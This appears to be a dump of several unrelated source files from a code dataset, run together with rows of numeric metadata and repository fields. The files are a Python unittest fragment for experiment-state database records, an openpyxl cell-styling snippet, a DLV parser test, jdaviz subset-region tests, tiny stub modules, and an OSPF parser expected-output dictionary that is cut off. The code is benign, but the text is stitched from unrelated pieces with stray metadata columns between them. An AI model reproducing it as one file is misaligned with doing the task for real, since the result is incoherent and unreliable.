ExperimentDefinition().create_table(self._db)
ed_1 = ExperimentDefinition(start_date=datetime.datetime(2019,1,1))
trace_id_1=ed_1.store(self._db)
ed_2 = ExperimentDefinition()
trace_id_2=ed_2.store(self._db)
ed_g1= GroupExperimentDefinition(machine="kkk")
ed_g1.add_sub_trace(trace_id_1)
ed_g1.add_sub_trace(trace_id_2)
ed_g1.store(self._db)
ed_g2 = GroupExperimentDefinition()
print(ed_g2._subtraces)
ed_g2.add_sub_trace(trace_id_1)
ed_g2.store(self._db)
one_g=GroupExperimentDefinition()
self.assertTrue(one_g.load_pending(self._db))
self.assertNotEqual(one_g._work_state, "pre_analyzing")
ed_1.upate_state(self._db, "analysis_done")
self.assertTrue(one_g.load_pending(self._db))
self.assertEqual(one_g._work_state, "pre_analyzing")
self.assertEqual(one_g._trace_id, ed_g2._trace_id)
one_g=GroupExperimentDefinition()
self.assertTrue(one_g.load_pending(self._db))
ed_2.upate_state(self._db, "analysis_done")
self.assertTrue(one_g.load_pending(self._db))
self.assertEqual(one_g._work_state, "pre_analyzing")
self.assertEqual(one_g._trace_id, ed_g1._trace_id)
def test_is_it_ready_to_process(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
t1 = ExperimentDefinition()
id1=t1.store(self._db)
t2 = ExperimentDefinition()
id2=t2.store(self._db)
t3 = GroupExperimentDefinition(subtraces=[id1, id2])
t3.store(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "The subtraces"
" are still pending, it should not be possible to"
" process it.")
t1.mark_simulation_done(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "One subtrace"
" is still pending, it should not be possible to"
" process it.")
t2.mark_simulation_done(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "Subtraces "
"have to be analyzed for this the grouped to be "
"ready")
t1.mark_analysis_done(self._db)
t2.mark_analysis_done(self._db)
self.assertTrue(t3.is_it_ready_to_process(self._db), "Subtraces "
"are analyzed. It should be ready")
def test_is_it_ready_to_process_delta(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
t1 = ExperimentDefinition()
id1=t1.store(self._db)
t2 = ExperimentDefinition()
id2=t2.store(self._db)
t3 = DeltaExperimentDefinition(subtraces=[id1, id2])
t3.store(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "The subtraces"
" are still pending, it should not be possible to"
" process it.")
t1.mark_simulation_done(self._db)
self.assertFalse(t3.is_it_ready_to_process(self._db), "One subtrace"
" is still pending, it should not be possible to"
" process it.")
t2.mark_simulation_done(self._db)
self.assertTrue(t3.is_it_ready_to_process(self._db), "Subtraces "
"are genreated, t3, should be ready to run.")
def test_get_fresh_concurrent(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
for i in range(200):
ed.store(self._db)
if os.path.exists("./out.file"):
os.remove("./out.file")
out = open("./out.file", "w")
p = subprocess.Popen(["python", "./fresh_reader.py"], stdout=out)
count = 0
there_are_more=True
ids=[]
while there_are_more:
ed_f = ExperimentDefinition()
there_are_more = ed_f.load_fresh(self._db)
if there_are_more:
ids.append(ed_f._trace_id)
time.sleep(5)
out.flush()
out.close()
out = open("./out.file", "r")
lines = out.readlines()
other_ids=[]
for line in lines:
if "END2" in line:
print("")
text_list=line.split("END2: [")[1]
text_list=text_list.split("]")[0]
other_ids = [int(x) for x in text_list.split(",")]
self.assertGreater(len(ids), 0)
self.assertGreater(len(other_ids), 0)
for id in ids:
self.assertNotIn(id, other_ids)
print(("IDs", ids, other_ids))
def test_mark_simulating(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.mark_simulating(self._db, "MyWorker")
now_time=datetime.datetime.now()
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._work_state, "simulating")
self.assertEqual(new_ed._worker, "MyWorker")
self.assertLess(now_time-new_ed._simulating_start,
datetime.timedelta(10))
def test_mark_simulation_done(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.mark_simulation_done(self._db)
now_time=datetime.datetime.now()
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._work_state, "simulation_done")
self.assertLess(now_time-new_ed._simulating_end,
datetime.timedelta(10))
def test_mark_simulation_failed(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.mark_simulation_failed(self._db)
now_time=datetime.datetime.now()
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._work_state, "simulation_failed")
self.assertLess(now_time-new_ed._simulating_end,
datetime.timedelta(10))
def test_reset_simulating_time(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
my_id=ed.store(self._db)
ed.update_simulating_start(self._db)
ed.update_simulating_end(self._db)
new_ed = ExperimentDefinition()
new_ed.load(self._db, my_id)
self.assertNotEqual(new_ed._simulating_end, None)
self.assertNotEqual(new_ed._simulating_start, None)
ed.reset_simulating_time(self._db)
new_ed.load(self._db, my_id)
self.assertEqual(new_ed._simulating_end, None)
self.assertEqual(new_ed._simulating_start,None)
def test_load_next_ready_for_pass(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
ed_1=ExperimentDefinition()
ed_2=ExperimentDefinition()
ed_3=ExperimentDefinition()
ed_4=ExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_2._workflow_handling="single"
ed_2._work_state="analysis_done"
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
target_trace_id=ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
#ed_4 should be skipped.
ed_4.store(self._db)
ed_1b=ExperimentDefinition()
ed_2b=ExperimentDefinition()
ed_3b=ExperimentDefinition()
ed_1b._workflow_handling="manifest"
ed_1b._work_state="analysis_done"
ed_2b._workflow_handling="single"
ed_2b._work_state="analysis_done"
ed_3b._workflow_handling="multi"
ed_3b._work_state="analysis_done"
target_trace_id_b=ed_1b.store(self._db)
ed_2b.store(self._db)
ed_3b.store(self._db)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id, ed._trace_id)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id_b, ed._trace_id)
def test_load_next_ready_for_pass_error(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
ed_1=ExperimentDefinition()
ed_2=ExperimentDefinition()
ed_3=ExperimentDefinition()
ed_4=ExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_2._workflow_handling="multi"
ed_2._work_state="analysis_done"
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
target_trace_id=ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
ed_4.store(self._db)
#ed_1 to ed_4 should be skipped.
ed_1b=ExperimentDefinition()
ed_2b=ExperimentDefinition()
ed_3b=ExperimentDefinition()
ed_1b._workflow_handling="manifest"
ed_1b._work_state="analysis_done"
ed_2b._workflow_handling="single"
ed_2b._work_state="analysis_done"
ed_3b._workflow_handling="multi"
ed_3b._work_state="analysis_done"
target_trace_id_b=ed_1b.store(self._db)
ed_2b.store(self._db)
ed_3b.store(self._db)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id_b, ed._trace_id)
def test_load_next_grouped_ready_for_pass(self):
ed = GroupExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
other=ExperimentDefinition()
other.store(self._db)
subids_1=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="manifest"
subt_1._work_state="analysis_done"
subids_1.append(subt_1.store(self._db))
subids_2=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="analysis_done"
subids_2.append(subt_1.store(self._db))
subids_3=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="analysis_done"
subids_3.append(subt_1.store(self._db))
ed_1=GroupExperimentDefinition()
ed_2=GroupExperimentDefinition()
ed_3=GroupExperimentDefinition()
ed_4=GroupExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_1._subtraces=subids_1
ed_2._workflow_handling="single"
ed_2._work_state="analysis_done"
ed_2._subtraces=subids_2
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
ed_3._subtraces=subids_3
target_trace_id=ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
#ed_4 should be skipped.
ed_4.store(self._db)
subids_1=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="manifest"
subt_1._work_state="analysis_done"
subids_1.append(subt_1.store(self._db))
subids_2=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="analysis_done"
subids_2.append(subt_1.store(self._db))
subids_3=[]
for i in range(5):
subt_1=ExperimentDefinition()
subt_1._workflow_handling="single"
subt_1._work_state="fresh"
subids_3.append(subt_1.store(self._db))
ed_1=GroupExperimentDefinition()
ed_2=GroupExperimentDefinition()
ed_3=GroupExperimentDefinition()
ed_4=GroupExperimentDefinition()
ed_1._workflow_handling="manifest"
ed_1._work_state="analysis_done"
ed_1._subtraces=subids_1
ed_2._workflow_handling="single"
ed_2._work_state="analysis_done"
ed_2._subtraces=subids_2
ed_3._workflow_handling="multi"
ed_3._work_state="analysis_done"
ed_3._subtraces=subids_3
ed_1.store(self._db)
ed_2.store(self._db)
ed_3.store(self._db)
#ed_4 should be skipped.
ed_4.store(self._db)
ed.load_next_ready_for_pass(self._db)
self.assertEqual(target_trace_id, ed._trace_id)
ed._work_state="second_pass_done"
ed.store(self._db)
newEd=GroupExperimentDefinition()
self.assertRaises(ValueError, newEd.load_next_ready_for_pass, self._db)
| 38.094241
| 80
| 0.574995
| 2,523
| 21,828
| 4.629409
| 0.08918
| 0.052911
| 0.045205
| 0.036729
| 0.830993
| 0.811473
| 0.788955
| 0.760873
| 0.755223
| 0.75411
| 0
| 0.040664
| 0.318398
| 21,828
| 573
| 81
| 38.094241
| 0.744388
| 0.006185
| 0
| 0.727079
| 0
| 0.004264
| 0.116887
| 0.025047
| 0
| 0
| 0
| 0
| 0.164179
| 1
| 0.03838
| false
| 0.021322
| 0.014925
| 0
| 0.055437
| 0.006397
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a308f19f79fb2ed9cc5dcd557ab43105ed854bb
| 1,041
|
py
|
Python
|
default_filled_in_text.py
|
PCSailor/python_openpyxl_dcflog
|
ee10a3cde550b0d76fd033912de32af38d010589
|
[
"MIT"
] | null | null | null |
default_filled_in_text.py
|
PCSailor/python_openpyxl_dcflog
|
ee10a3cde550b0d76fd033912de32af38d010589
|
[
"MIT"
] | null | null | null |
default_filled_in_text.py
|
PCSailor/python_openpyxl_dcflog
|
ee10a3cde550b0d76fd033912de32af38d010589
|
[
"MIT"
] | null | null | null |
''' From Page 11 '''
# Yes or No values 9 and 696969
sheet.cell(row=row, column=col).value = 'Yes / No'
sheet.cell(row=row, column=col).font = Font(size = 9, color='696969')
# ✓ X values 8 and DCDCDC
sheet.cell(row=row, column=col).value = '✓ X'
sheet.cell(row=row, column=col).font = Font(size=8, color='DCDCDC')
# RH% 8 and 696969
sheet.cell(row=row, column=col).value = '%RH'
sheet.cell(row=row, column=col).font = Font(size=8, color='696969')
# Hz 8 and 696969
sheet.cell(row=row, column=col).value = 'Hz'
sheet.cell(row=row, column=col).font = Font(size=8, color='696969')
# D/P 8 and 696969
sheet.cell(row=row, column=col).value = 'D/P'
sheet.cell(row=row, column=col).font = Font(size=8, color='696969')
# Colored Cells
# Dark Grey
sheet.cell(row=row, column=col).fill = PatternFill(fgColor='C0C0C0', fill_type = 'solid')
# Light Grey
sheet.cell(row=row, column=col).fill = PatternFill(fgColor='C0C0C0', fill_type = 'solid')
| 41.64
| 89
| 0.618636
| 164
| 1,041
| 3.926829
| 0.231707
| 0.167702
| 0.223602
| 0.279503
| 0.844721
| 0.844721
| 0.844721
| 0.799689
| 0.799689
| 0.684783
| 0
| 0.080097
| 0.208453
| 1,041
| 24
| 90
| 43.375
| 0.699029
| 0.214217
| 0
| 0.416667
| 0
| 0
| 0.098504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3ae637f7612db14cf67820e0ebe41297e4aa10fe
| 793
|
py
|
Python
|
tests/parser/nonground.query.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/nonground.query.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/nonground.query.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
% This is most similar to nonground.query.3, just without the second
% constraint. We originally failed to process this correctly.
color(red,X) | color(green,X) | color(blue,X) :- node(X).
node("Cosenza").
node("Vienna").
node("Diamante").
redish :- color(red,"Vienna").
dark :- not color(red,"Vienna").
:- redish, not dark.
%:- dark, not redish.
color(X,Y)?
"""
output = """
% This is most similar to nonground.query.3, just without the second
% constraint. We originally failed to process this correctly.
color(red,X) | color(green,X) | color(blue,X) :- node(X).
node("Cosenza").
node("Vienna").
node("Diamante").
redish :- color(red,"Vienna").
dark :- not color(red,"Vienna").
:- redish, not dark.
%:- dark, not redish.
color(X,Y)?
"""
| 21.432432
| 69
| 0.6343
| 112
| 793
| 4.491071
| 0.294643
| 0.095427
| 0.111332
| 0.067594
| 0.978131
| 0.978131
| 0.978131
| 0.978131
| 0.978131
| 0.978131
| 0
| 0.003072
| 0.179067
| 793
| 36
| 70
| 22.027778
| 0.769585
| 0
| 0
| 0.923077
| 0
| 0.076923
| 0.959264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aafb9eefcc0795d1ec7a0afcfcce812f33d4d209
| 3,841
|
py
|
Python
|
jdaviz/tests/test_subsets.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 55
|
2019-05-24T18:53:05.000Z
|
2022-03-14T08:45:52.000Z
|
jdaviz/tests/test_subsets.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 1,105
|
2019-05-09T15:17:35.000Z
|
2022-03-31T21:22:18.000Z
|
jdaviz/tests/test_subsets.py
|
rosteen/jdaviz
|
e02c08d68ef71c5e40600785f46e65e5ae95e236
|
[
"MIT",
"BSD-3-Clause"
] | 49
|
2019-05-07T18:05:42.000Z
|
2022-03-22T15:15:34.000Z
|
import numpy as np
import pytest
from glue.core import Data
from glue.core.roi import RectangularROI, XRangeROI
from numpy.testing import assert_allclose
from regions import RectanglePixelRegion
from jdaviz.app import Application
@pytest.fixture
def jdaviz_app():
return Application(configuration='cubeviz')
def test_region_from_subset_2d(jdaviz_app):
data = Data(flux=np.ones((128, 128)), label='Test 2D Flux')
jdaviz_app.data_collection.append(data)
jdaviz_app.add_data_to_viewer('flux-viewer', 'Test 2D Flux')
jdaviz_app.get_viewer('flux-viewer').apply_roi(RectangularROI(1, 3.5, -0.2, 3.3))
subsets = jdaviz_app.get_subsets_from_viewer('flux-viewer')
reg = subsets.get('Subset 1')
assert len(subsets) == 1
assert isinstance(reg, RectanglePixelRegion)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.y, 1.55)
assert_allclose(reg.width, 2.5)
assert_allclose(reg.height, 3.5)
def test_region_from_subset_3d(jdaviz_app):
data = Data(flux=np.ones((256, 128, 128)), label='Test 3D Flux')
jdaviz_app.data_collection.append(data)
jdaviz_app.add_data_to_viewer('flux-viewer', 'Test 3D Flux')
jdaviz_app.get_viewer('flux-viewer').apply_roi(RectangularROI(1, 3.5, -0.2, 3.3))
subsets = jdaviz_app.get_subsets_from_viewer('flux-viewer')
reg = subsets.get('Subset 1')
assert len(subsets) == 1
assert isinstance(reg, RectanglePixelRegion)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.y, 1.55)
assert_allclose(reg.width, 2.5)
assert_allclose(reg.height, 3.5)
def test_region_from_subset_profile(jdaviz_app, spectral_cube_wcs):
data = Data(flux=np.ones((256, 128, 128)), label='Test 1D Flux', coords=spectral_cube_wcs)
jdaviz_app.data_collection.append(data)
jdaviz_app.add_data_to_viewer('spectrum-viewer', 'Test 1D Flux')
jdaviz_app.get_viewer("spectrum-viewer").apply_roi(XRangeROI(1, 3.5))
subsets = jdaviz_app.get_subsets_from_viewer('spectrum-viewer', subset_type='spectral')
reg = subsets.get('Subset 1')
assert len(subsets) == 1
assert isinstance(reg, RectanglePixelRegion)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.y, 128)
assert_allclose(reg.width, 2.5)
assert_allclose(reg.height, 256)
def test_region_spectral_spatial(jdaviz_app, spectral_cube_wcs):
data = Data(flux=np.ones((256, 128, 128)), label='Test Flux', coords=spectral_cube_wcs)
jdaviz_app.data_collection.append(data)
jdaviz_app.add_data_to_viewer('spectrum-viewer', 'Test Flux')
jdaviz_app.add_data_to_viewer('flux-viewer', 'Test Flux')
jdaviz_app.get_viewer("spectrum-viewer").apply_roi(XRangeROI(1, 3.5))
flux_viewer = jdaviz_app.get_viewer("flux-viewer")
# We set the active tool here to trigger a reset of the Subset state to "Create new"
flux_viewer.toolbar.active_tool = flux_viewer.toolbar.tools['bqplot:rectangle']
flux_viewer.apply_roi(RectangularROI(1, 3.5, -0.2, 3.3))
subsets = jdaviz_app.get_subsets_from_viewer('spectrum-viewer', subset_type='spectral')
reg = subsets.get('Subset 1')
assert len(subsets) == 1
assert isinstance(reg, RectanglePixelRegion)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.y, 128)
assert_allclose(reg.width, 2.5)
assert_allclose(reg.height, 256)
subsets = jdaviz_app.get_subsets_from_viewer('flux-viewer', subset_type='spatial')
reg = subsets.get('Subset 2')
assert len(subsets) == 1
assert isinstance(reg, RectanglePixelRegion)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.x, 2.25)
assert_allclose(reg.center.y, 1.55)
assert_allclose(reg.width, 2.5)
assert_allclose(reg.height, 3.5)
| 33.99115
| 94
| 0.73106
| 580
| 3,841
| 4.62931
| 0.144828
| 0.083799
| 0.145624
| 0.111359
| 0.818622
| 0.804097
| 0.793669
| 0.780261
| 0.780261
| 0.748976
| 0
| 0.042224
| 0.142932
| 3,841
| 112
| 95
| 34.294643
| 0.77339
| 0.021349
| 0
| 0.636364
| 0
| 0
| 0.099548
| 0
| 0
| 0
| 0
| 0
| 0.441558
| 1
| 0.064935
| false
| 0
| 0.090909
| 0.012987
| 0.168831
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c966accaa41da53dee5de330137f3db8c12d88d6
| 46
|
py
|
Python
|
src/lib/BaseHTTPServer.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/BaseHTTPServer.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/BaseHTTPServer.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("BaseHTTPServer")
| 23
| 45
| 0.804348
| 6
| 46
| 5.333333
| 0.666667
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.744186
| 0
| 0
| 0
| 0
| 0
| 0.304348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c985ed257c0ec5d698ea9a86f2c000cd53fc0011
| 50
|
py
|
Python
|
sample_app/foo/bar1.py
|
ali5h/pazel
|
c861a358f577c81d6d8298b478bfe4449889be59
|
[
"MIT"
] | null | null | null |
sample_app/foo/bar1.py
|
ali5h/pazel
|
c861a358f577c81d6d8298b478bfe4449889be59
|
[
"MIT"
] | null | null | null |
sample_app/foo/bar1.py
|
ali5h/pazel
|
c861a358f577c81d6d8298b478bfe4449889be59
|
[
"MIT"
] | null | null | null |
import numpy as np
def sample():
return 1.0
| 8.333333
| 18
| 0.64
| 9
| 50
| 3.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0.28
| 50
| 5
| 19
| 10
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a386882a055e1f8e3e9da36d87b41a3fe13fa4b2
| 62,054
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfDatabaseRouter/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfDatabaseRouter/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowIpOspfDatabaseRouter/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"vrf": {
"default": {
"address_family": {
"ipv4": {
"instance": {
"1": {
"areas": {
"0.0.0.0": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.4.1.1 10.4.1.1": {
"adv_router": "10.4.1.1",
"lsa_id": "10.4.1.1",
"ospfv2": {
"body": {
"router": {
"links": {
"10.4.1.1": {
"link_data": "255.255.255.255",
"link_id": "10.4.1.1",
"num_mtid_metrics": 2,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
},
32: {
"metric": 1,
"mt_id": 32,
},
33: {
"metric": 1,
"mt_id": 33,
},
},
"type": "stub network",
},
"10.1.2.1": {
"link_data": "10.1.2.1",
"link_id": "10.1.2.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.1.4.4": {
"link_data": "10.1.4.1",
"link_id": "10.1.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.4.1.1",
"age": 742,
"checksum": "0x6228",
"length": 60,
"lsa_id": "10.4.1.1",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "8000003D",
"type": 1,
},
},
},
"10.16.2.2 10.16.2.2": {
"adv_router": "10.16.2.2",
"lsa_id": "10.16.2.2",
"ospfv2": {
"body": {
"router": {
"links": {
"10.1.2.1": {
"link_data": "10.1.2.2",
"link_id": "10.1.2.1",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.2.3.3": {
"link_data": "10.2.3.2",
"link_id": "10.2.3.3",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.2.4.4": {
"link_data": "10.2.4.2",
"link_id": "10.2.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.16.2.2": {
"link_data": "255.255.255.255",
"link_id": "10.16.2.2",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 4,
}
},
"header": {
"adv_router": "10.16.2.2",
"age": 1520,
"checksum": "0x672A",
"length": 72,
"lsa_id": "10.16.2.2",
"option": "None",
"option_desc": "No TOS-capability, No DC",
"seq_num": "80000013",
"type": 1,
},
},
},
"10.36.3.3 10.36.3.3": {
"adv_router": "10.36.3.3",
"lsa_id": "10.36.3.3",
"ospfv2": {
"body": {
"router": {
"links": {
"10.2.3.3": {
"link_data": "10.2.3.3",
"link_id": "10.2.3.3",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.3.4.4": {
"link_data": "10.3.4.3",
"link_id": "10.3.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.36.3.3": {
"link_data": "255.255.255.255",
"link_id": "10.36.3.3",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 3,
}
},
"header": {
"adv_router": "10.36.3.3",
"age": 235,
"checksum": "0x75F8",
"length": 60,
"lsa_id": "10.36.3.3",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000033",
"type": 1,
},
},
},
"10.64.4.4 10.64.4.4": {
"adv_router": "10.64.4.4",
"lsa_id": "10.64.4.4",
"ospfv2": {
"body": {
"router": {
"links": {
"10.1.4.4": {
"link_data": "10.1.4.4",
"link_id": "10.1.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.2.4.4": {
"link_data": "10.2.4.4",
"link_id": "10.2.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.3.4.4": {
"link_data": "10.3.4.4",
"link_id": "10.3.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "transit network",
},
"10.64.4.4": {
"link_data": "255.255.255.255",
"link_id": "10.64.4.4",
"num_mtid_metrics": 0,
"topologies": {
0: {
"metric": 1,
"mt_id": 0,
"tos": 0,
}
},
"type": "stub network",
},
},
"num_of_links": 4,
}
},
"header": {
"adv_router": "10.64.4.4",
"age": 1486,
"as_boundary_router": True,
"checksum": "0xA57C",
"length": 72,
"lsa_id": "10.64.4.4",
"option": "None",
"option_desc": "No TOS-capability, DC",
"seq_num": "80000036",
"type": 1,
},
},
},
},
}
}
}
}
}
},
"2": {
"areas": {
"0.0.0.1": {
"database": {
"lsa_types": {
1: {
"lsa_type": 1,
"lsas": {
"10.229.11.11 10.229.11.11": {
"adv_router": "10.229.11.11",
"lsa_id": "10.229.11.11",
"ospfv2": {
"body": {
"router": {
"links": {
